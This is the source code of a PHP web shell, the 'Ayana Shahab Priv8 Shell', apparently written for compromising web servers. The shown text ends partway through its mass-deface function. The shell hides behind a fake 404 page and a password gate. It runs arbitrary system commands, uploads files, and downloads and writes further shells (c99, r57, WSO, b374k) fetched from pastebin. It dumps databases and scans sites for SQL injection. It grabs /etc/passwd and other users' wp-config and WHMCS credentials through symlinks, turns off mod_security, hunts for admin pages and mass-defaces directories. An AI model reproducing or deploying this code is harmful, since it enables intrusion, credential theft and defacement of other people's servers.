'); $s57_paswot = "39a54ee9b50e3484df126d83277593dc";//default password : achan , change with md5 type hash ;) . function login() { $a_log ="".judul.""; $a_log.="achan@".$_SERVER['HTTP_HOST'].":".getcwd()." $ sudo su"; $a_log.="
"; $a_log.=""; if(empty($_GET['login'])=="achan"){ echo ' 404 Not Found

Not Found

The requested URL '.$_SERVER['REQUEST_URI'].' was not found on this server.


'.$_SERVER['SERVER_SOFTWARE'].' Server at '.$_SERVER['HTTP_HOST'].' Port 80
'; }else{ echo $a_log; } exit; } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $s57_paswot ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $s57_paswot) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else login(); if(empty($_GET['i'])){ $d=getcwd(); }else{ $d=$_GET['i']; } function tentang(){ $tentang="
";
	$tentang.="
	+-------------------------------------------------+
	|          ~[ Ayana Shahab Priv8 Shell ]~         |
	|         c0dename  : Mrs.sl33pyH34d              |
	|         Author    : shutdown57 a.k.a alinko-kun |
	|         Written   : PHP,HTML,CSS(w3.css),JS     |
	+-------------------------------------------------+";
	$tentang.="
"; $tentang.="

Ayana Shahab priv8 shell

"; $tentang.="

linuxcode.org ~ WithOutShadow ~ PeSec Team

"; $tentang.="

Thanks for :

"; $tentang.="

God , You , sunr-15 , google.com ,pastebin.com , [-]sh4d0w_99[!] , MRG#7 , indoXploit , devilzc0de , StackOverFlow , w3schools , tutorialpoint

"; return $tentang; } function tentangAchan(){ $usia=date('Y')-1997; $achan="

About ayana shahab

"; $achan.="
"; $achan.=""; $achan.=""; $achan.=""; $achan.=""; $achan.=""; $achan.="
Name :Ayana Shahab
Born :Osaka, 3 June 1997 (age $usia)
Member :JKT48 at Team K3
Career :2011-2016 (JKT48 Team J) ,Dec 2016 (JKT48 Team K3)
"; $achan.='

'; return $achan; } function tentangJKT48(){ $jkt="
";
   $jkt.="
__      _ _  _______ _  _    ___   __
\ \    | | |/ /_   _| || |  ( _ ) / /
 \ \_  | | ' /  | | | || |_ / _ \/ / 
 / / |_| | . \  | | |__   _| (_) \ \ 
/_/ \___/|_|\_\ |_|    |_|  \___/ \_\
                                     
 Joyfull Kawaii Try to be the best
";
  $jkt.="
"; $jkt.=""; $jkt.="
"; return $jkt; } $l=array( 'adminer'=>"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php", 'wso'=>"http://pastebin.com/raw/N0eh3Q7Y", 'bejak'=>"http://pastebin.com/raw/sQJVES6y", 'indoxploit_shell'=>'http://pastebin.com/raw/nC6pWh5a', 'andela'=>'http://pastebin.com/raw/0dkmjaWJ', 'injection'=>'http://pastebin.com/raw/znH7r6Jr', 'sbh'=>'http://pastebin.com/raw/SMDJVTF8', 'bh'=>'http://pastebin.com/raw/3L2ESWeu', 'c99'=>'http://pastebin.com/raw/Ms0ptnpH', 'r57'=>'http://pastebin.com/raw/S9tzBgg3', ); function ambilcode($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } function ukuranupil($upil){ $size = filesize($upil)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } return $size; } function perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function lmodif($upil){ $mod=date('d M Y [H:m]',filemtime($upil)); return $mod; } function owngro($file){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owngro=$name['name'].":".$group['name']; return $owngro; } $html_a=''; $html_a.=''.judul.''; $html_a.=' '; $html_a.=''; $nav_a ='';//end echo $html_a; echo $nav_a; $disabled=(is_writable($d)) ? : "disabled"; if(isset($_POST['upfile'])){ $files = array( '1' => $_FILES['files']['name'], '2' => $_FILES['files2']['name'], '3' => $_FILES['files3']['name'], '4' => $_FILES['files4']['name'], '5' => $_FILES['files5']['name'] ); $tmp= array( '1' => $_FILES['files']['tmp_name'], '2' => $_FILES['files2']['tmp_name'], '3' => $_FILES['files3']['tmp_name'], '4' => $_FILES['files4']['tmp_name'], '5' => $_FILES['files5']['tmp_name'] ); $dir=array( '1' => $_POST['dir']."/", '2' => $_POST['dir2']."/", '3' => $_POST['dir3']."/", '4' => $_POST['dir4']."/", '5' => $_POST['dir5']."/" ); move_uploaded_file($tmp['1'],$dir['1'].$files['1']); move_uploaded_file($tmp['2'],$dir['2'].$files['2']); move_uploaded_file($tmp['3'],$dir['3'].$files['3']); move_uploaded_file($tmp['4'],$dir['4'].$files['4']); move_uploaded_file($tmp['5'],$dir['5'].$files['5']); echo ""; } if(is_writable($d)){ $stat='Writable [OK]'; }else{ $stat='Not Writable [Read-Only]'; } echo''; echo''; echo $form_a; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } function convertByte($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } $os=(preg_match('/linux|Linux/',php_uname())) ? "" : ""; $sm= ini_get('safe_mode') ? " ON" : " OFF"; $mysql= function_exists('mysql_connect')?" ON":" OFF"; $url_fp =ini_get('url_fopen')?" ON":" OFF"; $curl=function_exists('curl_init')?" ON":" OFF"; $df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : " NONE"; echo "
HOSTNAME : ".$_SERVER['HTTP_HOST']."
Free Disk : ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."
IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']."
SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']."
User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
PHP version : ".phpversion()."-[PHPINFO] CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."
UNAME : ".php_uname()."
DISABLE FUNCTIONS :".$df."
File :
"; if(isset($_POST['subup'])){ if(move_uploaded_file($_FILES['upfile']['tmp_name'],$d."/".$_FILES['upfile']['name'])){ echo ""; }else{ echo ""; } } echo"
"; $d=str_replace('\\','/',$d); $path = explode('/',$d); foreach($path as $id=>$curdir){ if($curdir == '' && $id == 0){ $a = true; echo '/'; continue; } if($curdir == '') continue; echo ''.$curdir.'/'; } $pwd=str_replace('\\','/',getcwd()); (is_writable($d))?$stat=" ~ WRITABLE" :$stat="NOT WRITABLE"; echo $stat."

"; if(empty($_GET['a'])){ echo'
'; echo''; echo ""; $s=scandir($d); $no=1; $total_file=0; $total_dir=0; foreach ($s as $d2) { if(!is_dir("$d/$d2")||$d2=='.'||$d2=='..')continue; if(mime_content_type("$d/$d2")){ $mime=mime_content_type("$d/$d2"); }else{ $mime="unknow/denied"; } echo ""; $total_dir++; } foreach ($s as $f) { if(!is_file("$d/$f")||$f=='.'||$f=='..')continue; if(mime_content_type("$d/$f")){ $mime= mime_content_type("$d/$f"); }else{ $mime="unknow/denied"; } echo ""; $total_file++; } echo '
No.^NameSizeTypeGroup:OwnerPermissionLast ModifiedAction
0--achan/linkachan:ayana~~
".$no++." $d2".ukuranupil("$d/$d2")."".$mime."".owngro("$d/$d2")."".perms("$d/$d2")."".lmodif("$d/$d2")."
".$no++." $f".ukuranupil("$d/$f")."".$mime."".owngro("$d/$f")."".perms("$d/$f")."".lmodif("$d/$f")."
'; if(isset($_POST['select'])){ $file=$_POST['cekf']; $dir=$_POST['cekd']; if($_POST['select']=='del'){ if($_POST['cekf']){ foreach ($file as $cekf) { if(unlink($cekf)){ echo""; } } } if($_POST['cekd']){ foreach ($dir as $cekd) { if(rmdir($cekd)){ echo""; } }}}elseif($_POST['select']=='backup'){ if($_POST['cekf']){ foreach ($file as $copy) { $copi=basename($copy); if(!file_exists("backup")){ @mkdir('backup'); } if(copy($copy,"backup/".basename($copy))){ echo""; }else{ echo "[FAIL]--> ".basename($Copy)."
"; } } } }elseif ($_POST['select']=='unzip') { @mkdir("extract"); foreach ($file as $unzip) { $zip = new ZipArchive; $res = $zip->open($unzip); if ($res === TRUE) { $zip->extractTo("extract"); $zip->close(); echo""; } else { echo "[FAIL] feiled!"; } } }elseif($_POST['select']=='gz'){ if($_POST['cekf']){ if(!file_exists("compress")){ @mkdir("compress"); } foreach($file as $gz){ $gzfile = "compress/".basename($gz).".gz"; $fp = gzopen($gzfile, 'w9'); if(gzwrite($fp, file_get_contents($gz))){ echo""; } gzclose($fp); } } }elseif ($_POST['select']=='tar') { try { $a = new PharData('achan48.tar'); foreach($file as $tar){ $a->addFile($tar); } $a->compress(Phar::GZ); @unlink('achan48.tar'); } catch (Exception $e) { echo "Exception : " . $e; } } } }else{ function refpage($url){ echo''; } if($_GET['a']=='rename'){ echo "

New name

newname :
"; if(isset($_POST['newname'])){ if(rename($_GET['i']."/".$_GET['s'],$_GET['i']."/".$_POST['newname'])){ refpage('?i='.$_GET['i']); }else{ refpage('?i='.$_GET['i']); } } }elseif ($_GET['a']=='rmdir') { function rmdir_unlink_rmdir($d){ if(!rmdir($d)){ $s=scandir($d); foreach ($s as $ss) { if(is_file($d."/".$ss)){ if(unlink($d."/".$ss)){ rmdir($d); } } if(is_dir($d."/".$ss)){ rmdir($d."/".$ss); rmdir($d); } } } } if(rmdir_unlink_rmdir($_GET['i']."/".$_GET['s'])){ refpaage('?i='.$_GET['i']); }else{ refpage('?i='.$_GET['i']); } }elseif ($_GET['a']=='unlink') { if(unlink($_GET['i']."/".$_GET['s'])){ refpage('?i='.$_GET['i']); }else{ refpage('?i='.$_GET['i']); } }elseif ($_GET['a']=='view') { echo'

View file

Current file: '.$_GET['i'].'/'.$_GET['s'].'

'; $f=$_GET['i'].'/'.$_GET['s']; $file = wordwrap(file_get_contents($f),160,"\n",true); $a= highlight_string($file,true); $old = array("0000BB","000000","FF8000","DD0000", "007700"); $new = array("f00","000", "333333", "f000e1" , "FF8000"); $a= str_ireplace($old,$new, $a); $result = $a; echo'
'.$result.'
'; }elseif ($_GET['a']=='edit') { echo "

Edit file

save as :
"; } if(isset($_POST['sbmt'])){ $fp=fopen($_GET['i']."/".$_POST['namabaru'],'w'); if(fwrite($fp,$_POST['txta'])){ refpage("?i=".$_GET['i']); }else{ refpage("?i=".$_GET['i']); } fclose($fp); }elseif ($_GET['a']=='download') { ob_clean(); $dunlut = $_GET['i']."/".$_GET['s']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($dunlut).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($dunlut)); readfile($dunlut); exit; }elseif ($_GET['a']=='chmod') { echo "

Change Permission

new Permission :
"; } if(isset($_POST['perms'])){ if(chmod($_GET['i']."/".$_GET['s'],$_POST['perms'])){ refpage("?i=".$_GET['i']); }else{ refpage("?i=".$_GET['i']); } }elseif ($_GET['a']=='tentang') { echo tentang(); }elseif ($_GET['a']=='shell') { echo "

Terminal Command Shell

achan@".$_SERVER['HTTP_HOST'].":".getcwd()." $
"; if(isset($_POST['shell'])){ system($_POST['shell']); } echo "
"; }elseif ($_GET['a']=='cmd') { if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { echo "

Command Prompt

achan > ".getcwd()."  >
"; if(isset($_POST['cmd'])){ exe($_POST['shell']); } echo "
"; }else{ echo "

This Just Work in Windows Server.

"; } }elseif ($_GET['a']=='phpinfo') { @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"")+6; $akhir = strpos($buff,""); echo "
".substr($buff,$awal,$akhir-$awal)."
"; }elseif ($_GET['a']=='wso') { if(ambilcode($l['wso'],'achan-wso.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='injection') { if(ambilcode($l['injection'],'achan-1n73ction.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='bejak') { if(ambilcode($l['bejak'],'achan-b374k.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='idx') { if(ambilcode($l['indoxploit_shell'],'achan-indoxploit.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='c') { if(ambilcode($l['c99'],'achan-c99.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='r') { if(ambilcode($l['r57'],'achan-r57.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='andela') { if(ambilcode($l['andela'],'achan-andela.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='sbh') { if(ambilcode($l['sbh'],'achan-sbh.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='bh') { if(ambilcode($l['bh'],'achan-bh.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='adminer') { if(ambilcode($l['adminer'],'achan-adminer.php')){ echo"Request done! Click Here!"; }else{ echo"Failed check your connection!"; } }elseif ($_GET['a']=='svc') { echo'

SQL injection vulnerable checker



'; if(isset($_POST['submit'])){ $ko=$_POST['korban']; $pisah=explode("\n",$ko); echo "
"; $no=1; foreach ($pisah as $ah) { $dapatkan=file_get_contents($ah."'"); if(preg_match('/SQL syntax;|You Have Error|Warning|mysql_fetch_array|mysql_fetch_assoc|mysql_num_rows/',$dapatkan)){ echo ""; }else{ echo ""; } } } echo "
No.WebsiteStatus
".$no++."".$ah."[vulnerable]
".$no++."".$ah."[not vulnerable]
"; }elseif ($_GET['a']=='dbdump') { echo '

Database dumper

Hostname
Username
Password
DataBase
DB Type
'; if (isset($_POST['btnx'])){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "achan-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="achan-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="achan-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='ssql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='ssql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } }elseif ($_GET['a']=='mkdir') { echo "

Mass Make Directory


"; if(isset($_POST['mkdir'])){ $dir=$_POST['mkdir']; $mdir=explode("\n",$dir); foreach ($mdir as $ndir) { mkdir($_GET['i']."/".$ndir,0777); } echo ""; } }elseif ($_GET['a']=='mkfile') { echo "

Make File

Save as:

"; if(isset($_POST['subfile'])){ $xp=fopen($_POST['letakf'],"w"); if(fwrite($xp,$_POST['mkfile'])){ echo ""; }else{ echo ""; } fclose($xp); } }elseif ($_GET['a']=='hi') { if(isset($_POST['gethash'])){ $hash = $_POST['hash']; if(strlen($hash)==32){ $hashresult = "MD5 Hash"; }elseif(strlen($hash)==40){ $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; }elseif(strlen($hash)==13){ $hashresult = "DES(Unix) Hash"; }elseif(strlen($hash)==16){ $hashresult = "MySQL Hash / /DES(Oracle Hash)"; }elseif(strlen($hash)==41){ $GetHashChar = substr($hash, 40); if($GetHashChar == "*"){ $hashresult = "MySQL5 Hash"; } }elseif(strlen($hash)==64){ $hashresult = "SHA-256 Hash"; }elseif(strlen($hash)==96){ $hashresult = "SHA-384 Hash"; }elseif(strlen($hash)==128){ $hashresult = "SHA-512 Hash"; }elseif(strlen($hash)==34){ if(strstr($hash, '$1$')){ $hashresult = "MD5(Unix) Hash"; } }elseif(strlen($hash)==37){ if(strstr($hash, '$apr1$')){ $hashresult = "MD5(APR) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$H$')){ $hashresult = "MD5(phpBB3) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$P$')){ $hashresult = "MD5(Wordpress) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$5$')){ $hashresult = "SHA-256(Unix) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$6$')){ $hashresult = "SHA-512(Unix) Hash"; } }elseif(strlen($hash)==24){ if(strstr($hash, '==')){ $hashresult = "MD5(Base-64) Hash"; } }else{ $hashresult = "Hash type not found"; } }else{ $hashresult = "Not Hash Enteindigo"; } echo'

Hash Identification

Enter Hash:
Result:'.$hashresult.'
'; }elseif ($_GET['a']=='ph') { $submit= $_POST['enter']; if (isset($submit)) { $pass = $_POST['password']; $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; $hash = md5($pass); $md4 = hash("md4",$pass); $hash_md5 = md5($salt.$pass); $hash_md5_double = md5(sha1($salt.$pass)); $hash1 = sha1($pass); $sha256 = hash("sha256",$text); $hash1_sha1 = sha1($salt.$pass); $hash1_sha1_double = sha1(md5($salt.$pass)); } echo '

Password Hash

Input string :
Hasil Hash
Original Password
MD5
MD4
MD5 with Salt
MD5 with Salt & Sha1
Sha1
Sha256
Sha1 with Salt
Sha1 with Salt & MD5
'; }elseif ($_GET['a']=='ed') { echo'

Enc0de & Dec0de + Conventer





'; $a = $_POST['e']; $o = $_POST['opt']; if(isset($_POST['c'])){ switch($o){ case'dechex'; $s= dechex($a); break; case'dechex'; $s= hexdec($a); break; case'decoct'; $s= decoct($a); break; case'octdec'; $s= octdec($a); break; case'decbin'; $s= decbin($a); break; case'bindec'; $s= bindec($a); break; case'hexbin'; $s= hex2bin($a); break; case'binhex'; $s= bin2hex($a); break; } echo'
:: OutPut ::
'; }elseif(isset($_POST['en'])){ switch($o){ case'url'; $r=urlencode($a); break; case'base64'; $r=base64_encode($a); break; case'urlbase64'; $r=urlencode(base64_encode($a)); break; case'gz64'; $r=base64_encode(gzdeflate($a)); break; case'sgz64'; $r=base64_encode(gzdeflate(str_rot13($a))); break; case's64'; $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a))))); break; case'sb64'; $r=base64_encode(str_rot13($a)); break; case'64url'; $r=base64_encode(urlencode($a)); break; case'64u64u'; $r=base64_encode(urlencode(base64_encode(urlencode($a)))); break; case'cuu'; $r=convert_uuencode($a); break; case'sgzcuus64'; $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a))))); break; case'ss64'; $r=str_rot13(str_rot13(base64_encode($a))); break; } echo'
:: OutPut::
'; } //Dec0de if(isset($_POST['de'])){ switch($o){ case'url'; $r=urldecode($a); break; case'base64'; $r=base64_decode($a); break; case'urlbase64'; $r=base64_decode(urldecode($a)); break; case'gz64'; $r=gzinflate(base64_decode($a)); break; case'sgz64'; $r=str_rot13(gzinflate(base64_decode($a))); break; case's64'; $r=str_rot13(gzinflate(str_rot13(base64_decode($a)))); break; case'sb64'; $r=str_rot13(base64_decode($a)); break; case'64url'; $r=urldecode(base64_decode($a)); break; case'64u64u'; $r=urldecode(base64_decode(urldecode(base64_decode($a)))); break; case'cuu'; $r=convert_uudecode($a); break; case'sgzcuus64'; $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a))))); break; case'ss64'; $r=base64_decode(str_rot13(str_rot13($a))); } $rx = htmlspecialchars($r); echo'
:: OutPut::
'; } }elseif ($_GET['a']=='rs') { echo"

auto replace string


"; if(isset($_POST['sstr'])){ $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']); if($rep){ echo' '; } } echo "
"; }elseif ($_GET['a']=='logout') { session_destroy(); echo ""; }elseif ($_GET['a']=='achan') { echo tentangAchan(); }elseif ($_GET['a']=='jkt48') { echo tentangJKT48(); }elseif ($_GET['a']=='cg') { if(!file("/etc/passwd")){ $etcpasswd="/etc/passwd gak bisa di akses!";}else{ $etcpasswd= file_get_contents('/etc/passwd');} echo'

Config Grabber

'; echo'


'; if(isset($_POST['su'])) { mkdir('config_grab',0777); $r = " \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n"; $f = fopen('config_grab/.htaccess','w'); fwrite($f,$r); echo "
TOUCH ME SENPAI
"; $usr=explode("\n",$_POST['user']); foreach($usr as $uss) { $us=trim($uss); $r="config_grab/"; symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config'); symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config'); symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config'); symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config'); symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs'); symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs'); symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs'); symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients'); symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client'); symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing'); symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config'); } echo'
berhasil!! touch me senpai..
'; } }elseif ($_GET['a']=='af') { echo'

Admin finder

'; echo'
site :

'; function xss_protect($data, $strip_tags = false, $allowed_tags = "") { if($strip_tags) { $data = strip_tags($data, $allowed_tags . ""); } if(stripos($data, "script") !== false) { $result = str_replace("script","script", htmlentities($data, ENT_QUOTES)); } else { $result = htmlentities($data, ENT_QUOTES); } return $result; } function urlExist($url) { $handle = curl_init($url); if (false === $handle) { return false; } curl_setopt($handle, CURLOPT_HEADER, false); curl_setopt($handle, CURLOPT_FAILONERROR, true); curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox curl_setopt($handle, CURLOPT_NOBODY, true); curl_setopt($handle, CURLOPT_RETURNTRANSFER, false); $connectable = curl_exec($handle); curl_close($handle); return $connectable; } if(isset($_POST['submit']) && isset($_POST['url'])) { $url= htmlentities(xss_protect($_POST['url'])); if(filter_var($url, FILTER_VALIDATE_URL)) { $trying = array(':2082',':2083','a_admins/','admin/','adminweb/','po-admin','index.php?q=admin','administrator/','admin/admin.php','cpanel','admin3/','admin4/','admin5/','usuarios/', 'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/', 'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php', 'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php', 'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html', 'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php', 'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php', 'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html', 'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php', 'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php', 'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html', 'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php', 'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php', 'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php', 'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html', 'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html', 'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html', 'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php', 'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php', 'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php', 'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php', 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp', 'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp', 'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp', 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp', 'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp', 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp', 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp'); echo ""; foreach($trying as $sec) { $urll=$url.'/'.$sec; if(urlExist($urll)) { echo ''; exit; } else { echo ''; } } echo ''; } else { echo ''; } echo "
WebsiteStatus
'.$urll.'FOUND
'.$urll.'NOT FOUND
Could not find admin page.[!]
invalid url Enteindigo
"; } }elseif ($_GET['a']=='md') { echo'

Mass deface

by indoXploit '; function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "
"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "
